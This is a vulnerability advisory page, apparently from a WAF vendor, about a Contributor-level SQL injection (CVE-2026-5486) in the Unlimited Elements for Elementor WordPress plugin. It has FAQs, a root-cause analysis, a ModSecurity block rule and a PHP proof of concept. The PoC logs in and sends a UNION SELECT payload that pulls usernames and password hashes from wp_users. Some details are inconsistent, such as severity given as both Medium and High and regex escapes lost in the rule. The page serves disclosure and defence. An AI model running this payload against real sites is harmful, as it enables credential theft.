What is CVE-2026-5486?

CVE-2026-5486 is a SQL Injection vulnerability affecting the Unlimited Elements for Elementor plugin for WordPress, specifically in versions up to and including 2.0.7. It allows authenticated users with Contributor-level access or higher to inject arbitrary SQL commands via the ‘data[filter_search]’ parameter in the get_cat_addons AJAX action.

How does the SQL injection work?

The vulnerability arises from insufficient input sanitization and the use of deprecated escaping functions. The normalizeAjaxInputData() function strips slashes from user input, and the filter_search parameter is then improperly escaped and concatenated into a SQL query, allowing attackers to manipulate the query and extract sensitive data.

Who is affected by this vulnerability?

Any WordPress site using the Unlimited Elements for Elementor plugin version 2.0.7 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability if they can obtain a valid nonce through the Elementor editor.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Unlimited Elements for Elementor plugin installed on your WordPress site. If it is version 2.0.7 or earlier, your site is susceptible to this vulnerability.

What are the risks associated with CVE-2026-5486?

The vulnerability has a CVSS score of 6.5, indicating a medium severity level. Successful exploitation can lead to unauthorized access to sensitive information in the database, including user credentials, but does not allow for data modification or remote code execution.

How can I fix this vulnerability?

To remediate this vulnerability, update the Unlimited Elements for Elementor plugin to version 2.0.8 or later, which addresses the issue by using prepared statements instead of deprecated escaping functions. Additionally, ensure proper nonce verification and capability checks are implemented.

What is a proof of concept (PoC) in this context?

The proof of concept for CVE-2026-5486 is a PHP script that demonstrates how an authenticated attacker can exploit the vulnerability. It outlines the steps to authenticate and send a crafted AJAX request that includes SQL injection payloads, illustrating the risk of data exposure.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability poses a significant risk of data exposure, it requires specific conditions to be exploited, such as authenticated access and knowledge of the nonce.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Unlimited Elements for Elementor plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to Contributor-level users and above, thereby reducing the risk of exploitation.

How can I ensure my site remains secure in the future?

To maintain security, regularly update all WordPress plugins and themes, monitor for vulnerabilities, and implement security plugins that provide firewall and malware scanning features. Additionally, conduct periodic security audits to identify and mitigate potential risks.

What is the normalizeAjaxInputData() function?

The normalizeAjaxInputData() function is responsible for processing user input in AJAX requests. In this vulnerability, it strips slashes from the input, which inadvertently removes protective measures provided by WordPress, leading to the SQL injection risk.

What are prepared statements and why are they important?

Prepared statements are a method of executing SQL queries that separate the SQL code from the data being passed. This prevents SQL injection by ensuring that user input is treated as data only, not executable code, thus mitigating the risk of injection attacks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 14, 2026

CVE-2026-5486: Unlimited Elements For Elementor <= 2.0.7 – Authenticated (Contributor+) SQL Injection via 'filter_search' Parameter (unlimited-elements-for-elementor)

CVE ID CVE-2026-5486

Plugin unlimited-elements-for-elementor

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 2.0.7

Patched Version —

Disclosed May 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5486 (metadata-based):

This vulnerability in Unlimited Elements for Elementor (versions 2.0.7 and earlier) allows authenticated SQL injection through the ‘data[filter_search]’ parameter in the get_cat_addons AJAX action. The CVSS score of 6.5 (High) reflects the potential for significant data exposure, though exploitation requires Contributor-level access or higher. Atomic Edge analysis confirms that the root cause involves multiple defensive failures: the normalizeAjaxInputData() function strips slashes from all user input, which removes the protective layer added by WordPress’s wp_magic_quotes() function. After stripping slashes, the plugin passes the filter_search value through wpdb->_escape() (a deprecated function that provides incomplete escaping for LIKE clause wildcards). The escaped value is then directly concatenated into a SQL LIKE clause without using prepared statements or parameterized queries. The CWE-89 classification confirms this is a classic SQL injection vulnerability, and the description explicitly confirms these code patterns, so Atomic Edge considers this analysis to be based on confirmed report details rather than inference.

For exploitation, an authenticated attacker with Contributor-level access must first obtain a valid AJAX nonce, which is accessible through the Elementor editor interface. The attacker then sends a POST request to /wp-admin/admin-ajax.php with action=unlimited_elements_get_cat_addons (the typical pattern for this plugin’s AJAX handlers) and a crafted data[filter_search] parameter containing SQL injection payloads. The attack exploits the LIKE clause context, allowing the use of wildcard characters and UNION-based injection to extract arbitrary data from the WordPress database. A typical payload might include a UNION SELECT statement that extracts usernames and password hashes from the wp_users table, with the injected SQL appended via a closing quote and OR clause.

Remediation requires replacing the deprecated wpdb->_escape() function with proper prepared statements using $wpdb->prepare() with placeholders (%s) for the LIKE clause parameter. The normalizeAjaxInputData() function should stop stripping slashes globally, as that counteracts WordPress’s built-in input validation. The fix should also implement proper nonce verification and capability checks (at least edit_posts for Contributors) before processing the AJAX request. The patched version 2.0.8 likely implements these changes by replacing string concatenation with parameterized queries and removing the stripslashes() call.

The impact of successful exploitation is limited to data confidentiality (CVSS: H/I:N/A:N), meaning an attacker can read sensitive information from the database but cannot modify or delete data. This includes extracting WordPress user credentials (username and password hashes), user email addresses, session tokens, and any other data stored in the WordPress database. While the attacker cannot directly achieve remote code execution through this vulnerability, extracted password hashes could be cracked offline, leading to administrator account compromise and eventual full site takeover. The confidentiality breach alone represents a critical risk to user privacy and site security.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-5486 (metadata-based)
# Blocks SQL injection attempts via 'data[filter_search]' in Unlimited Elements AJAX handler
# Targets authenticated attackers with Contributor+ access exploiting nonce leak
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-5486 - SQL Injection via filter_search parameter in Unlimited Elements for Elementor',severity:'CRITICAL',tag:'CVE-2026-5486'"
    SecRule ARGS_POST:action "@streq unlimited_elements_get_cat_addons" 
        "chain"
        SecRule ARGS_POST:/^data[filter_search]$/ "@rx (?i)(?:bunionb.*bselectb|bselectb.*bfromb|bdropb|bdeleteb|binsertb|bupdateb|bORb.*=.*|bANDb.*=.*|'.*--|/*.**/|bexecb|bxp_cmdshellb)" 
            "t:none,t:urlDecode,t:removeNulls,t:compressWhitespace"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5486 - Unlimited Elements For Elementor <= 2.0.7 - Authenticated (Contributor+) SQL Injection via 'filter_search' Parameter

/**
 * This PoC demonstrates SQL injection via the get_cat_addons AJAX action.
 * Assumptions:
 * 1. The AJAX action name follows the pattern 'unlimited_elements_get_cat_addons'
 * 2. The nonce parameter name is likely '_wpnonce' or 'nonce'
 * 3. The attacker has valid Contributor-level credentials
 * 4. WordPress is installed at the $target_url
 *
 * Usage:
 *   1. Set your WordPress target URL, username, and password below
 *   2. Run: php cve-2026-5486-poc.php
 */

$target_url = 'http://example.com/wordpress'; // CHANGE THIS
$username   = 'contributor_user';             // CHANGE THIS
$password   = 'contributor_pass';             // CHANGE THIS

// Step 1: Authenticate and get cookies
$login_url = rtrim($target_url, '/') . '/wp-login.php';
$login_post = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => rtrim($target_url, '/') . '/wp-admin/',
    'testcookie' => 1
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_post));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve-2026-5486-cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract nonce from Elementor editor or wp-admin (we assume a known valid nonce for PoC)
// In reality, the attacker would need to obtain a valid nonce from the Elementor editor page.
// For this PoC, we attempt to extract a nonce from the wp-admin page as a proxy.
$admin_url = rtrim($target_url, '/') . '/wp-admin/';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-5486-cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$admin_page = curl_exec($ch);
curl_close($ch);

// Extract a nonce from the page (this is a simplified approach)
preg_match('/"_wpnonce":"([a-f0-9]+)"/', $admin_page, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '0000000000';
echo "[+] Using nonce: $noncen";

// Step 3: Perform SQL injection
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// SQL injection payload: extract all usernames and password hashes from wp_users
// The injection exploits the LIKE clause; we close the existing query and UNION select
$sql_payload = "test' OR 1=1 UNION SELECT user_login,user_pass,user_email,ID,user_registered,user_status,display_name FROM wp_users-- ";

$post_data = [
    'action' => 'unlimited_elements_get_cat_addons',
    '_wpnonce' => $nonce,
    'data[filter_search]' => $sql_payload
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-5486-cookies.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'X-Requested-With: XMLHttpRequest',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'
]);
$response = curl_exec($ch);
curl_close($ch);

echo "[+] Response:n";
echo $response . "n";

// Clean up
unlink('/tmp/cve-2026-5486-cookies.txt');

Frequently Asked Questions

What is CVE-2026-5486?
Overview of the vulnerability
CVE-2026-5486 is a SQL Injection vulnerability affecting the Unlimited Elements for Elementor plugin for WordPress, specifically in versions up to and including 2.0.7. It allows authenticated users with Contributor-level access or higher to inject arbitrary SQL commands via the ‘data[filter_search]’ parameter in the get_cat_addons AJAX action.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and the use of deprecated escaping functions. The normalizeAjaxInputData() function strips slashes from user input, and the filter_search parameter is then improperly escaped and concatenated into a SQL query, allowing attackers to manipulate the query and extract sensitive data.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Unlimited Elements for Elementor plugin version 2.0.7 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability if they can obtain a valid nonce through the Elementor editor.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Unlimited Elements for Elementor plugin installed on your WordPress site. If it is version 2.0.7 or earlier, your site is susceptible to this vulnerability.
What are the risks associated with CVE-2026-5486?
Understanding the impact
The vulnerability has a CVSS score of 6.5, indicating a medium severity level. Successful exploitation can lead to unauthorized access to sensitive information in the database, including user credentials, but does not allow for data modification or remote code execution.
How can I fix this vulnerability?
Remediation steps
To remediate this vulnerability, update the Unlimited Elements for Elementor plugin to version 2.0.8 or later, which addresses the issue by using prepared statements instead of deprecated escaping functions. Additionally, ensure proper nonce verification and capability checks are implemented.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept for CVE-2026-5486 is a PHP script that demonstrates how an authenticated attacker can exploit the vulnerability. It outlines the steps to authenticate and send a crafted AJAX request that includes SQL injection payloads, illustrating the risk of data exposure.
What does the CVSS score of 6.5 mean?
Interpreting the severity rating
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability poses a significant risk of data exposure, it requires specific conditions to be exploited, such as authenticated access and knowledge of the nonce.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Unlimited Elements for Elementor plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to Contributor-level users and above, thereby reducing the risk of exploitation.
How can I ensure my site remains secure in the future?
Best practices for WordPress security
To maintain security, regularly update all WordPress plugins and themes, monitor for vulnerabilities, and implement security plugins that provide firewall and malware scanning features. Additionally, conduct periodic security audits to identify and mitigate potential risks.
What is the normalizeAjaxInputData() function?
Role in the vulnerability
The normalizeAjaxInputData() function is responsible for processing user input in AJAX requests. In this vulnerability, it strips slashes from the input, which inadvertently removes protective measures provided by WordPress, leading to the SQL injection risk.
What are prepared statements and why are they important?
Key to preventing SQL injection
Prepared statements are a method of executing SQL queries that separate the SQL code from the data being passed. This prevents SQL injection by ensuring that user input is treated as data only, not executable code, thus mitigating the risk of injection attacks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations